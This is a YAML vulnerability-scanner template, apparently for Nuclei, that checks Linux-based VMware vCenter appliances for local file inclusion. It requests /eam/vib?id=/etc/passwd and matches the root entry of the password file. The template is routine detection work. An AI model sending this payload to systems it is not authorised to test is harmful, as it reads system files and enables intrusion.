id: vmware-vcenter-lfi-linux

info:
  name: Linux Vmware Vcenter - Local File Inclusion
  author: PR3R00T
  severity: high
  description: Linux appliance based Vmware Vcenter is vulnerable to local file inclusion.
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: vmware,lfi,vcenter,linux

http:
  - method: GET
    path:
      - "{{BaseURL}}/eam/vib?id=/etc/passwd"

    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

# digest: 490a0046304402206d8377187bb51c01e70fba68c8ad4c8291653246e28d264d46c574b5a6756a83022079a7bd39844b70cfb476b83c4c48b83bbe075a469e11175d94811084f9fde04a:922c64590222798bb761d5b6d8e72950
